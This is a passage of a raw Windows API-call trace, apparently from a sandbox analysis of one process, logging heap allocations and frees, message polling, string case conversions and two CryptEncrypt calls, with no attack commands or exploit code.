Flags=0x0, Size=0x40) returned 0x3854980 [0214.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0214.077] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0214.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0214.078] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.078] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854980 | out: hHeap=0x2af0000) returned 1 [0214.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0214.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0214.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0214.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0214.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0214.079] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0214.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0214.080] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0214.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0214.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0214.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0214.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0214.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0214.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab608, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.084] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0214.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.084] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0214.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.085] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.085] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x8) returned 1 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.085] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.085] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.085] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.085] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.085] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.085] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.086] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") 